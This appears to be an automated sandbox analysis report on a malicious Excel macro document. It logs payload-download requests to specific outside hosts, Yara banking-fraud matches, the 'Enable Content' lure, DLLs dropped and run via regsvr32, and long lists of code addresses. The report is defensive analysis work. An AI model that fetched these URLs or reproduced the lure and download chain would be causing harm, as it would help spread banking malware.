Source: global traffic HTTP traffic detected: GET /PHPExcel/sQ78BedribNJZbGYj/ HTTP/1.1Accept: */*UA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: www.careofu.comConnection: Keep-Alive
Source: global traffic HTTP traffic detected: GET /SDM/qNeMUe2RvxdvuRlf/ HTTP/1.1Accept: */*UA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: fikti.bem.gunadarma.ac.idConnection: Keep-Alive
Source: global traffic HTTP traffic detected: GET /cgi-bin/Gu0xno0kIssGJF8/ HTTP/1.1Accept: */*UA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: balticcontrolbd.comConnection: Keep-Alive
Source: unknown HTTPS traffic detected: 175.98.167.163:443 -> 192.168.2.22:49173 version: TLS 1.2
Source: unknown HTTPS traffic detected: 118.98.72.14:443 -> 192.168.2.22:49178 version: TLS 1.2

E-Banking Fraud

barindex
Source: Yara match File source: 0000000A.00000002.1758141495.000000000021A000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000008.00000002.1758179314.00000000003CA000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 10.3.regsvr32.exe.34e0108.1.unpack, type: UNPACKEDPE
Source: Yara match File source: 7.2.regsvr32.exe.4e0000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 10.3.regsvr32.exe.34ffb40.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 9.2.regsvr32.exe.1c0000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 9.2.regsvr32.exe.1c0000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 7.2.regsvr32.exe.4e0000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 10.3.regsvr32.exe.2110000.2.unpack, type: UNPACKEDPE
Source: Yara match File source: 10.3.regsvr32.exe.34ffb40.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 10.3.regsvr32.exe.2110000.2.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 8.2.regsvr32.exe.150000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 8.2.regsvr32.exe.150000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 10.2.regsvr32.exe.4d0000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 10.2.regsvr32.exe.4d0000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 10.3.regsvr32.exe.34e0108.1.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 0000000A.00000003.1631224520.00000000034D1000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000007.00000002.1478954467.0000000180001000.00000020.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000009.00000002.1487067523.0000000180001000.00000020.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000A.00000002.1758289138.00000000004D0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000007.00000002.1478774301.00000000004E0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000008.00000002.1758111807.0000000000150000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000009.00000002.1486455282.00000000001C0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000008.00000002.1758759626.0000000180001000.00000020.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000A.00000002.1758703624.0000000180001000.00000020.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000A.00000003.1685880314.0000000002110000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY

System Summary

barindex
Source: Screenshot number: 4 Screenshot OCR: Enable Editing and click Enable Content. 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18
Source: Screenshot number: 4 Screenshot OCR: Enable Content. 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24
Source: MG72133243812OR.xls Macro extractor: Sheet: IJEIGOPSAGHSPHP contains: URLDownloadToFileA
Source: MG72133243812OR.xls Macro extractor: Sheet: IJEIGOPSAGHSPHP contains: URLDownloadToFileA
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE File created: C:\Users\user\hhwe4.ocx Jump to dropped file
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE File created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\nQd2n6798wQuOjZR7TtNgQ[1].dll Jump to dropped file
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE File created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\XNHC0JWC\BYH56Vb[1].dll Jump to dropped file
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE File created: C:\Users\user\hhwe3.ocx Jump to dropped file
Source: MG72133243812OR.xls Initial sample: EXEC
Source: MG72133243812OR.xls Initial sample: EXEC
Source: C:\Windows\System32\regsvr32.exe File created: C:\Windows\system32\OajQanYCSHcPg\ Jump to behavior
Source: C:\Windows\System32\regsvr32.exe Code function: 7_2_000007FEF9139C10 7_2_000007FEF9139C10
Source: C:\Windows\System32\regsvr32.exe Code function: 7_2_000007FEF917717C 7_2_000007FEF917717C
Source: C:\Windows\System32\regsvr32.exe Code function: 7_2_000007FEF914D224 7_2_000007FEF914D224
Source: C:\Windows\System32\regsvr32.exe Code function: 7_2_000007FEF9176040 7_2_000007FEF9176040
Source: C:\Windows\System32\regsvr32.exe Code function: 7_2_000007FEF91580D0 7_2_000007FEF91580D0
Source: C:\Windows\System32\regsvr32.exe Code function: 7_2_000007FEF914F0C0 7_2_000007FEF914F0C0
Source: C:\Windows\System32\regsvr32.exe Code function: 7_2_000007FEF914D108 7_2_000007FEF914D108
Source: C:\Windows\System32\regsvr32.exe Code function: 7_2_000007FEF9135340 7_2_000007FEF9135340
Source: C:\Windows\System32\regsvr32.exe Code function: 7_2_000007FEF915237C 7_2_000007FEF915237C
Source: C:\Windows\System32\regsvr32.exe Code function: 7_2_000007FEF91363B0 7_2_000007FEF91363B0
Source: C:\Windows\System32\regsvr32.exe Code function: 7_2_000007FEF916841C 7_2_000007FEF916841C
Source: C:\Windows\System32\regsvr32.exe Code function: 7_2_000007FEF9156290 7_2_000007FEF9156290
Source: C:\Windows\System32\regsvr32.exe Code function: 7_2_000007FEF914F2A8 7_2_000007FEF914F2A8
Source: C:\Windows\System32\regsvr32.exe Code function: 7_2_000007FEF91572C0 7_2_000007FEF91572C0
Source: C:\Windows\System32\regsvr32.exe Code function: 7_2_000007FEF91532CC 7_2_000007FEF91532CC
Source: C:\Windows\System32\regsvr32.exe Code function: 7_2_000007FEF916C310 7_2_000007FEF916C310
Source: C:\Windows\System32\regsvr32.exe Code function: 7_2_000007FEF914D328 7_2_000007FEF914D328
Source: C:\Windows\System32\regsvr32.exe Code function: 7_2_000007FEF914D54C 7_2_000007FEF914D54C
Source: C:\Windows\System32\regsvr32.exe Code function: 7_2_000007FEF9176570 7_2_000007FEF9176570
Source: C:\Windows\System32\regsvr32.exe Code function: 7_2_000007FEF91625B8 7_2_000007FEF91625B8
Source: C:\Windows\System32\regsvr32.exe Code function: 7_2_000007FEF91705AC 7_2_000007FEF91705AC
Source: C:\Windows\System32\regsvr32.exe Code function: 7_2_000007FEF91645F4 7_2_000007FEF91645F4
Source: C:\Windows\System32\regsvr32.exe Code function: 7_2_000007FEF916E608 7_2_000007FEF916E608
Source: C:\Windows\System32\regsvr32.exe Code function: 7_2_000007FEF914D444 7_2_000007FEF914D444
Source: C:\Windows\System32\regsvr32.exe Code function: 7_2_000007FEF914F4D4 7_2_000007FEF914F4D4
Source: C:\Windows\System32\regsvr32.exe Code function: 7_2_000007FEF914C758 7_2_000007FEF914C758
Source: C:\Windows\System32\regsvr32.exe Code function: 7_2_000007FEF9134770 7_2_000007FEF9134770
Source: C:\Windows\System32\regsvr32.exe Code function: 7_2_000007FEF914D770 7_2_000007FEF914D770
Source: C:\Windows\System32\regsvr32.exe Code function: 7_2_000007FEF9157790 7_2_000007FEF9157790
Source: C:\Windows\System32\regsvr32.exe Code function: 7_2_000007FEF917B790 7_2_000007FEF917B790
Source: C:\Windows\System32\regsvr32.exe Code function: 7_2_000007FEF91527A4 7_2_000007FEF91527A4
Source: C:\Windows\System32\regsvr32.exe Code function: 7_2_000007FEF91337C0 7_2_000007FEF91337C0
Source: C:\Windows\System32\regsvr32.exe Code function: 7_2_000007FEF914C650 7_2_000007FEF914C650
Source: C:\Windows\System32\regsvr32.exe Code function: 7_2_000007FEF914D668 7_2_000007FEF914D668
Source: C:\Windows\System32\regsvr32.exe Code function: 7_2_000007FEF91566C4 7_2_000007FEF91566C4
Source: C:\Windows\System32\regsvr32.exe Code function: 7_2_000007FEF914F6C0 7_2_000007FEF914F6C0
Source: C:\Windows\System32\regsvr32.exe Code function: 7_2_000007FEF9180724 7_2_000007FEF9180724
Source: C:\Windows\System32\regsvr32.exe Code function: 7_2_000007FEF916E608 7_2_000007FEF916E608
Source: C:\Windows\System32\regsvr32.exe Code function: 7_2_000007FEF914D998 7_2_000007FEF914D998
Source: C:\Windows\System32\regsvr32.exe Code function: 7_2_000007FEF914C980 7_2_000007FEF914C980
Source: C:\Windows\System32\regsvr32.exe Code function: 7_2_000007FEF9154988 7_2_000007FEF9154988
Source: C:\Windows\System32\regsvr32.exe Code function: 7_2_000007FEF9176A20 7_2_000007FEF9176A20
Source: C:\Windows\System32\regsvr32.exe Code function: 7_2_000007FEF914C878 7_2_000007FEF914C878
Source: C:\Windows\System32\regsvr32.exe Code function: 7_2_000007FEF914E890 7_2_000007FEF914E890
Source: C:\Windows\System32\regsvr32.exe Code function: 7_2_000007FEF914D890 7_2_000007FEF914D890
Source: C:\Windows\System32\regsvr32.exe Code function: 7_2_000007FEF91368B0 7_2_000007FEF91368B0
Source: C:\Windows\System32\regsvr32.exe Code function: 7_2_000007FEF91688CC 7_2_000007FEF91688CC
Source: C:\Windows\System32\regsvr32.exe Code function: 7_2_000007FEF914F8F0 7_2_000007FEF914F8F0
Source: C:\Windows\System32\regsvr32.exe Code function: 7_2_000007FEF916BB54 7_2_000007FEF916BB54
Source: C:\Windows\System32\regsvr32.exe Code function: 7_2_000007FEF914CBA4 7_2_000007FEF914CBA4
Source: C:\Windows\System32\regsvr32.exe Code function: 7_2_000007FEF914DBA8 7_2_000007FEF914DBA8
Source: C:\Windows\System32\regsvr32.exe Code function: 7_2_000007FEF9171BE8 7_2_000007FEF9171BE8
Source: C:\Windows\System32\regsvr32.exe Code function: 7_2_000007FEF914EA78 7_2_000007FEF914EA78
Source: C:\Windows\System32\regsvr32.exe Code function: 7_2_000007FEF914CA9C 7_2_000007FEF914CA9C
Source: C:\Windows\System32\regsvr32.exe Code function: 7_2_000007FEF914DAA0 7_2_000007FEF914DAA0
Source: C:\Windows\System32\regsvr32.exe Code function: 7_2_000007FEF9154ADC 7_2_000007FEF9154ADC
Source: C:\Windows\System32\regsvr32.exe Code function: 7_2_000007FEF914FAD8 7_2_000007FEF914FAD8
Source: C:\Windows\System32\regsvr32.exe Code function: 7_2_000007FEF9156B10 7_2_000007FEF9156B10
Source: C:\Windows\System32\regsvr32.exe Code function: 7_2_000007FEF9152B30 7_2_000007FEF9152B30
Source: C:\Windows\System32\regsvr32.exe Code function: 7_2_000007FEF9174D7C 7_2_000007FEF9174D7C
Source: C:\Windows\System32\regsvr32.exe Code function: 7_2_000007FEF916BB54 7_2_000007FEF916BB54
Source: C:\Windows\System32\regsvr32.exe Code function: 7_2_000007FEF914CDDC 7_2_000007FEF914CDDC
Source: C:\Windows\System32\regsvr32.exe Code function: 7_2_000007FEF916FE3C 7_2_000007FEF916FE3C
Source: C:\Windows\System32\regsvr32.exe Code function: 7_2_000007FEF9157C74 7_2_000007FEF9157C74
Source: C:\Windows\System32\regsvr32.exe Code function: 7_2_000007FEF9133C90 7_2_000007FEF9133C90
Source: C:\Windows\System32\regsvr32.exe Code function: 7_2_000007FEF914ECA4 7_2_000007FEF914ECA4
Source: C:\Windows\System32\regsvr32.exe Code function: 7_2_000007FEF914CCC4 7_2_000007FEF914CCC4
Source: C:\Windows\System32\regsvr32.exe Code function: 7_2_000007FEF914FD04 7_2_000007FEF914FD04
Source: C:\Windows\System32\regsvr32.exe Code function: 7_2_000007FEF9135F90 7_2_000007FEF9135F90
Source: C:\Windows\System32\regsvr32.exe Code function: 7_2_000007FEF9141FD8 7_2_000007FEF9141FD8
Source: C:\Windows\System32\regsvr32.exe Code function: 7_2_000007FEF9151FE8 7_2_000007FEF9151FE8
Source: C:\Windows\System32\regsvr32.exe Code function: 7_2_000007FEF914D000 7_2_000007FEF914D000
Source: C:\Windows\System32\regsvr32.exe Code function: 7_2_000007FEF916902C 7_2_000007FEF916902C
Source: C:\Windows\System32\regsvr32.exe Code function: 7_2_000007FEF914EE90 7_2_000007FEF914EE90
Source: C:\Windows\System32\regsvr32.exe Code function: 7_2_000007FEF9156EDC 7_2_000007FEF9156EDC
Source: C:\Windows\System32\regsvr32.exe Code function: 7_2_000007FEF9152EC0 7_2_000007FEF9152EC0
Source: C:\Windows\System32\regsvr32.exe Code function: 7_2_000007FEF914FEF0 7_2_000007FEF914FEF0
Source: C:\Windows\System32\regsvr32.exe Code function: 7_2_000007FEF914CEE4 7_2_000007FEF914CEE4
Source: C:\Windows\System32\regsvr32.exe Code function: 7_2_000007FEF9179F18 7_2_000007FEF9179F18
Source: C:\Windows\System32\regsvr32.exe Code function: 7_2_002C0000 7_2_002C0000
Source: C:\Windows\System32\regsvr32.exe Code function: 7_2_000000018001409C 7_2_000000018001409C
Source: C:\Windows\System32\regsvr32.exe Code function: 7_2_000000018000BA00 7_2_000000018000BA00
Source: C:\Windows\System32\regsvr32.exe Code function: 7_2_0000000180013320 7_2_0000000180013320
Source: C:\Windows\System32\regsvr32.exe Code function: 7_2_0000000180017368 7_2_0000000180017368
Source: C:\Windows\System32\regsvr32.exe Code function: 7_2_000000018001A38C 7_2_000000018001A38C
Source: C:\Windows\System32\regsvr32.exe Code function: 7_2_0000000180015C94 7_2_0000000180015C94
Source: C:\Windows\System32\regsvr32.exe Code function: 7_2_00000001800125B4 7_2_00000001800125B4
Source: C:\Windows\System32\regsvr32.exe Code function: 7_2_0000000180017E54 7_2_0000000180017E54
Source: C:\Windows\System32\regsvr32.exe Code function: 7_2_0000000180007E74 7_2_0000000180007E74
Source: C:\Windows\System32\regsvr32.exe Code function: 7_2_0000000180004F80 7_2_0000000180004F80
Source: C:\Windows\System32\regsvr32.exe Code function: 7_2_00000001800217E4 7_2_00000001800217E4
Source: C:\Windows\System32\regsvr32.exe Code function: 7_2_00000001800147EC 7_2_00000001800147EC
Source: C:\Windows\System32\regsvr32.exe Code function: 7_2_000000018000F038 7_2_000000018000F038
Source: C:\Windows\System32\regsvr32.exe Code function: 7_2_000000018001A83C 7_2_000000018001A83C
Source: C:\Windows\System32\regsvr32.exe Code function: 7_2_000000018000383C 7_2_000000018000383C
Source: C:\Windows\System32\regsvr32.exe Code function: 7_2_0000000180017870 7_2_0000000180017870
Source: C:\Windows\System32\regsvr32.exe Code function: 7_2_0000000180023078 7_2_0000000180023078
Source: C:\Windows\System32\regsvr32.exe Code function: 7_2_000000018000B078 7_2_000000018000B078
Source: C:\Windows\System32\regsvr32.exe Code function: 7_2_000000018002087C 7_2_000000018002087C
Source: C:\Windows\System32\regsvr32.exe Code function: 7_2_0000000180026098 7_2_0000000180026098
Source: C:\Windows\System32\regsvr32.exe Code function: 7_2_000000018000409C 7_2_000000018000409C
Source: C:\Windows\System32\regsvr32.exe Code function: 7_2_00000001800180A4 7_2_00000001800180A4
Source: C:\Windows\System32\regsvr32.exe Code function: 7_2_000000018000F8D0 7_2_000000018000F8D0
Source: C:\Windows\System32\regsvr32.exe Code function: 7_2_00000001800048D4 7_2_00000001800048D4
Source: C:\Windows\System32\regsvr32.exe Code function: 7_2_00000001800248F8 7_2_00000001800248F8
Source: C:\Windows\System32\regsvr32.exe Code function: 7_2_00000001800170FC 7_2_00000001800170FC
Source: C:\Windows\System32\regsvr32.exe Code function: 7_2_000000018001F108 7_2_000000018001F108
Source: C:\Windows\System32\regsvr32.exe Code function: 7_2_0000000180001910 7_2_0000000180001910
Source: C:\Windows\System32\regsvr32.exe Code function: 7_2_0000000180005914 7_2_0000000180005914
Source: C:\Windows\System32\regsvr32.exe Code function: 7_2_000000018001B95C 7_2_000000018001B95C
Source: C:\Windows\System32\regsvr32.exe Code function: 7_2_000000018001E964 7_2_000000018001E964
Source: C:\Windows\System32\regsvr32.exe Code function: 7_2_0000000180024180 7_2_0000000180024180
Source: C:\Windows\System32\regsvr32.exe Code function: 7_2_00000001800271A0 7_2_00000001800271A0
Source: C:\Windows\System32\regsvr32.exe Code function: 7_2_00000001800231A4 7_2_00000001800231A4
Source: C:\Windows\System32\regsvr32.exe Code function: 7_2_00000001800111AC 7_2_00000001800111AC
Source: C:\Windows\System32\regsvr32.exe Code function: 7_2_00000001800039D4 7_2_00000001800039D4
Source: C:\Windows\System32\regsvr32.exe Code function: 7_2_000000018001C9D8 7_2_000000018001C9D8
Source: C:\Windows\System32\regsvr32.exe Code function: 7_2_00000001800221FC 7_2_00000001800221FC
Source: C:\Windows\System32\regsvr32.exe Code function: 7_2_0000000180001208 7_2_0000000180001208
Source: C:\Windows\System32\regsvr32.exe Code function: 7_2_000000018001A228 7_2_000000018001A228
Source: C:\Windows\System32\regsvr32.exe Code function: 7_2_000000018001C230 7_2_000000018001C230
Source: C:\Windows\System32\regsvr32.exe Code function: 7_2_0000000180009230 7_2_0000000180009230
Source: C:\Windows\System32\regsvr32.exe Code function: 7_2_0000000180016238 7_2_0000000180016238
Source: C:\Windows\System32\regsvr32.exe Code function: 7_2_0000000180003248 7_2_0000000180003248
Source: C:\Windows\System32\regsvr32.exe Code function: 7_2_000000018000E254 7_2_000000018000E254
Source: C:\Windows\System32\regsvr32.exe Code function: 7_2_0000000180001A88 7_2_0000000180001A88
Source: C:\Windows\System32\regsvr32.exe Code function: 7_2_000000018001AA8C 7_2_000000018001AA8C
Source: C:\Windows\System32\regsvr32.exe Code function: 7_2_000000018001828C 7_2_000000018001828C
Source: C:\Windows\System32\regsvr32.exe Code function: 7_2_000000018001529C 7_2_000000018001529C
Source: C:\Windows\System32\regsvr32.exe Code function: 7_2_000000018000229C 7_2_000000018000229C
Source: C:\Windows\System32\regsvr32.exe Code function: 7_2_00000001800142A0 7_2_00000001800142A0
Source: C:\Windows\System32\regsvr32.exe Code function: 7_2_0000000180022AA4 7_2_0000000180022AA4
Source: C:\Windows\System32\regsvr32.exe Code function: 7_2_000000018000AACC 7_2_000000018000AACC
Source: C:\Windows\System32\regsvr32.exe Code function: 7_2_00000001800202E8 7_2_00000001800202E8
Source: C:\Windows\System32\regsvr32.exe Code function: 7_2_0000000180021B0C 7_2_0000000180021B0C
Source: C:\Windows\System32\regsvr32.exe Code function: 7_2_000000018000433C 7_2_000000018000433C
Source: C:\Windows\System32\regsvr32.exe Code function: 7_2_000000018000A368 7_2_000000018000A368
Source: C:\Windows\System32\regsvr32.exe Code function: 7_2_0000000180004B78 7_2_0000000180004B78
Source: C:\Windows\System32\regsvr32.exe Code function: 7_2_000000018001FB7C 7_2_000000018001FB7C
Source: C:\Windows\System32\regsvr32.exe Code function: 7_2_000000018000E37C 7_2_000000018000E37C
Source: C:\Windows\System32\regsvr32.exe Code function: 7_2_0000000180024BAC 7_2_0000000180024BAC
Source: C:\Windows\System32\regsvr32.exe Code function: 7_2_00000001800123B4 7_2_00000001800123B4
Source: C:\Windows\System32\regsvr32.exe Code function: 7_2_0000000180007BB8 7_2_0000000180007BB8
Source: C:\Windows\System32\regsvr32.exe Code function: 7_2_000000018001CBC4 7_2_000000018001CBC4
Source: C:\Windows\System32\regsvr32.exe Code function: 7_2_0000000180022BD0 7_2_0000000180022BD0
Source: C:\Windows\System32\regsvr32.exe Code function: 7_2_0000000180017C04 7_2_0000000180017C04
Source: C:\Windows\System32\regsvr32.exe Code function: 7_2_0000000180026410 7_2_0000000180026410
Source: C:\Windows\System32\regsvr32.exe Code function: 7_2_000000018001F414 7_2_000000018001F414
Source: C:\Windows\System32\regsvr32.exe Code function: 7_2_0000000180021418 7_2_0000000180021418
Source: C:\Windows\System32\regsvr32.exe Code function: 7_2_0000000180003C20 7_2_0000000180003C20
Source: C:\Windows\System32\regsvr32.exe Code function: 7_2_0000000180013C2C 7_2_0000000180013C2C
Source: C:\Windows\System32\regsvr32.exe Code function: 7_2_0000000180006C40 7_2_0000000180006C40
Source: C:\Windows\System32\regsvr32.exe Code function: 7_2_0000000180008458 7_2_0000000180008458
Source: C:\Windows\System32\regsvr32.exe Code function: 7_2_0000000180016C60 7_2_0000000180016C60
Source: C:\Windows\System32\regsvr32.exe Code function: 7_2_000000018002446C 7_2_000000018002446C
Source: C:\Windows\System32\regsvr32.exe Code function: 7_2_000000018000FC84 7_2_000000018000FC84
Source: C:\Windows\System32\regsvr32.exe Code function: 7_2_000000018000248C 7_2_000000018000248C
Source: C:\Windows\System32\regsvr32.exe Code function: 7_2_00000001800154C4 7_2_00000001800154C4
Source: C:\Windows\System32\regsvr32.exe Code function: 7_2_0000000180001CD8 7_2_0000000180001CD8
Source: C:\Windows\System32\regsvr32.exe Code function: 7_2_0000000180014D10 7_2_0000000180014D10
Source: C:\Windows\System32\regsvr32.exe Code function: 7_2_0000000180019D18 7_2_0000000180019D18
Source: C:\Windows\System32\regsvr32.exe Code function: 7_2_0000000180021528 7_2_0000000180021528
Source: C:\Windows\System32\regsvr32.exe Code function: 7_2_000000018001F528 7_2_000000018001F528
Source: C:\Windows\System32\regsvr32.exe Code function: 7_2_000000018000E538 7_2_000000018000E538
Source: C:\Windows\System32\regsvr32.exe Code function: 7_2_0000000180007D3C 7_2_0000000180007D3C
Source: C:\Windows\System32\regsvr32.exe Code function: 7_2_000000018000AD48 7_2_000000018000AD48
Source: C:\Windows\System32\regsvr32.exe Code function: 7_2_0000000180023D54 7_2_0000000180023D54
Source: C:\Windows\System32\regsvr32.exe Code function: 7_2_0000000180026D60 7_2_0000000180026D60
Source: C:\Windows\System32\regsvr32.exe Code function: 7_2_0000000180008564 7_2_0000000180008564
Source: C:\Windows\System32\regsvr32.exe Code function: 7_2_000000018000DD78 7_2_000000018000DD78
Source: C:\Windows\System32\regsvr32.exe Code function: 7_2_0000000180020D7C 7_2_0000000180020D7C
Source: C:\Windows\System32\regsvr32.exe Code function: 7_2_0000000180025D7C 7_2_0000000180025D7C
Source: C:\Windows\System32\regsvr32.exe Code function: 7_2_0000000180011DA8 7_2_0000000180011DA8
Source: C:\Windows\System32\regsvr32.exe Code function: 7_2_000000018000CDB0 7_2_000000018000CDB0
Source: C:\Windows\System32\regsvr32.exe Code function: 7_2_0000000180024DB4 7_2_0000000180024DB4
Source: C:\Windows\System32\regsvr32.exe Code function: 7_2_00000001800245C4 7_2_00000001800245C4
Source: C:\Windows\System32\regsvr32.exe Code function: 7_2_000000018000FDD4 7_2_000000018000FDD4
Source: C:\Windows\System32\regsvr32.exe Code function: 7_2_00000001800025DC 7_2_00000001800025DC
Source: C:\Windows\System32\regsvr32.exe Code function: 7_2_0000000180002DE8 7_2_0000000180002DE8
Source: C:\Windows\System32\regsvr32.exe Code function: 7_2_0000000180010E04 7_2_0000000180010E04
Source: C:\Windows\System32\regsvr32.exe Code function: 7_2_000000018001561C 7_2_000000018001561C
Source: C:\Windows\System32\regsvr32.exe Code function: 7_2_0000000180016628 7_2_0000000180016628
Source: C:\Windows\System32\regsvr32.exe Code function: 7_2_0000000180004E58 7_2_0000000180004E58
Source: C:\Windows\System32\regsvr32.exe Code function: 7_2_0000000180026688 7_2_0000000180026688
Source: C:\Windows\System32\regsvr32.exe Code function: 7_2_0000000180023698 7_2_0000000180023698
Source: C:\Windows\System32\regsvr32.exe Code function: 7_2_0000000180020EAB 7_2_0000000180020EAB
Source: C:\Windows\System32\regsvr32.exe Code function: 7_2_000000018001A6B8 7_2_000000018001A6B8
Source: C:\Windows\System32\regsvr32.exe Code function: 7_2_000000018001B6C0 7_2_000000018001B6C0
Source: C:\Windows\System32\regsvr32.exe Code function: 7_2_0000000180005EE4 7_2_0000000180005EE4
Source: C:\Windows\System32\regsvr32.exe Code function: 7_2_0000000180002EE8 7_2_0000000180002EE8
Source: C:\Windows\System32\regsvr32.exe Code function: 7_2_000000018000DEF0 7_2_000000018000DEF0
Source: C:\Windows\System32\regsvr32.exe Code function: 7_2_0000000180021F04 7_2_0000000180021F04
Source: C:\Windows\System32\regsvr32.exe Code function: 7_2_000000018000B714 7_2_000000018000B714
Source: C:\Windows\System32\regsvr32.exe Code function: 7_2_000000018000A73C 7_2_000000018000A73C
Source: C:\Windows\System32\regsvr32.exe Code function: 7_2_0000000180013F50 7_2_0000000180013F50
Source: C:\Windows\System32\regsvr32.exe Code function: 7_2_000000018001775C 7_2_000000018001775C
Source: C:\Windows\System32\regsvr32.exe Code function: 7_2_0000000180024F70 7_2_0000000180024F70
Source: C:\Windows\System32\regsvr32.exe Code function: 7_2_000000018000BF84 7_2_000000018000BF84
Source: C:\Windows\System32\regsvr32.exe Code function: 7_2_0000000180018788 7_2_0000000180018788
Source: C:\Windows\System32\regsvr32.exe Code function: 7_2_000000018001F794 7_2_000000018001F794
Source: C:\Windows\System32\regsvr32.exe Code function: 7_2_000000018001EFA4 7_2_000000018001EFA4
Source: C:\Windows\System32\regsvr32.exe Code function: 7_2_0000000180002FA8 7_2_0000000180002FA8
Source: C:\Windows\System32\regsvr32.exe Code function: 7_2_000000018000F7A8 7_2_000000018000F7A8
Source: C:\Windows\System32\regsvr32.exe Code function: 7_2_000000018001AFB8 7_2_000000018001AFB8
Source: C:\Windows\System32\regsvr32.exe Code function: 7_2_00000001800027E0 7_2_00000001800027E0
Source: C:\Windows\System32\regsvr32.exe Code function: 8_2_00140000 8_2_00140000
Source: C:\Windows\System32\regsvr32.exe Code function: 8_2_000000018000BA00 8_2_000000018000BA00
Source: C:\Windows\System32\regsvr32.exe Code function: 8_2_0000000180016628 8_2_0000000180016628
Source: C:\Windows\System32\regsvr32.exe Code function: 8_2_0000000180013C2C 8_2_0000000180013C2C
Source: C:\Windows\System32\regsvr32.exe Code function: 8_2_0000000180008458 8_2_0000000180008458
Source: C:\Windows\System32\regsvr32.exe Code function: 8_2_0000000180007E74 8_2_0000000180007E74
Source: C:\Windows\System32\regsvr32.exe Code function: 8_2_0000000180009474 8_2_0000000180009474
Source: C:\Windows\System32\regsvr32.exe Code function: 8_2_0000000180026688 8_2_0000000180026688
Source: C:\Windows\System32\regsvr32.exe Code function: 8_2_0000000180015C94 8_2_0000000180015C94
Source: C:\Windows\System32\regsvr32.exe Code function: 8_2_000000018001409C 8_2_000000018001409C
Source: C:\Windows\System32\regsvr32.exe Code function: 8_2_000000018000FEDC 8_2_000000018000FEDC
Source: C:\Windows\System32\regsvr32.exe Code function: 8_2_0000000180005EE4 8_2_0000000180005EE4
Source: C:\Windows\System32\regsvr32.exe Code function: 8_2_0000000180013320 8_2_0000000180013320
Source: C:\Windows\System32\regsvr32.exe Code function: 8_2_0000000180024F70 8_2_0000000180024F70
Source: C:\Windows\System32\regsvr32.exe Code function: 8_2_0000000180025D7C 8_2_0000000180025D7C
Source: C:\Windows\System32\regsvr32.exe Code function: 8_2_000000018001A38C 8_2_000000018001A38C
Source: C:\Windows\System32\regsvr32.exe Code function: 8_2_0000000180006D8C 8_2_0000000180006D8C
Source: C:\Windows\System32\regsvr32.exe Code function: 8_2_00000001800125B4 8_2_00000001800125B4
Source: C:\Windows\System32\regsvr32.exe Code function: 8_2_0000000180007BB8 8_2_0000000180007BB8
Source: C:\Windows\System32\regsvr32.exe Code function: 8_2_00000001800217E4 8_2_00000001800217E4
Source: C:\Windows\System32\regsvr32.exe Code function: 8_2_0000000180002DE8 8_2_0000000180002DE8
Source: C:\Windows\System32\regsvr32.exe Code function: 8_2_00000001800147EC 8_2_00000001800147EC
Source: C:\Windows\System32\regsvr32.exe Code function: 8_2_00000001800221FC 8_2_00000001800221FC
Source: C:\Windows\System32\regsvr32.exe Code function: 8_2_0000000180010E04 8_2_0000000180010E04
Source: C:\Windows\System32\regsvr32.exe Code function: 8_2_0000000180017C04 8_2_0000000180017C04
Source: C:\Windows\System32\regsvr32.exe Code function: 8_2_0000000180001208 8_2_0000000180001208
Source: C:\Windows\System32\regsvr32.exe Code function: 8_2_0000000180026410 8_2_0000000180026410
Source: C:\Windows\System32\regsvr32.exe Code function: 8_2_000000018001F414 8_2_000000018001F414
Source: C:\Windows\System32\regsvr32.exe Code function: 8_2_0000000180021418 8_2_0000000180021418
Source: C:\Windows\System32\regsvr32.exe Code function: 8_2_000000018001561C 8_2_000000018001561C
